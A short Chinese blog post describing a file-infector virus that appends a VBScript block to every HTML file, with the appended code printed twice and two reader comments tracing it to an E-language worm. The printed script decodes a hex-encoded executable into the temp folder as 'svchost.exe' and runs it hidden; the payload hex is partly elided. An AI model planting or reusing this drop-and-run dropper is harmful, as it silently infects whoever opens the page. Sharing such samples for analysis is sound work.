• 欢迎访问金刀客博客!
  • 2018,新年快乐!

最近遇到个js脚本感染病毒

病毒分析 admin 3394次浏览 已收录 2个评论

最近遇到个js脚本感染病毒,把每一个html文件都感染了,就是在文件末尾加一个js代码,功效未知。360说是virus.vbs.writebin.a病毒。

大致代码结构是这样的。

 

<SCRIPT Language=VBScript><!–
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E804000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

省略N多ANCD

36573730000004472616746696E697368000057696E48656C705700000000000000000000”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–></SCRIPT><SCRIPT Language=VBScript><!–
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B010

省略N多ABCD

65650000004578697450726F636573730000004472616746696E697368000057696E48656C705700000000000000000000”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–></SCRIPT>

 

 

功能好像还蛮强,样本给有需要的人吧。

2017111703545541

 


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明最近遇到个js脚本感染病毒
喜欢 (4)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(2)个小伙伴在吐槽
  1. 三六零已经不用了,公司查病毒,三六零一个没查出来,用其他的干出60个来~
    匿名2018-05-23 14:37 回复
  2. 最早在易语言小工具里面出现的,是易语言的一个蠕虫病毒,以前整个硬盘的html asp 都被感染了,反反复复,只要执行了中毒文件,蠕虫继续生效
    匿名2018-01-29 18:22 回复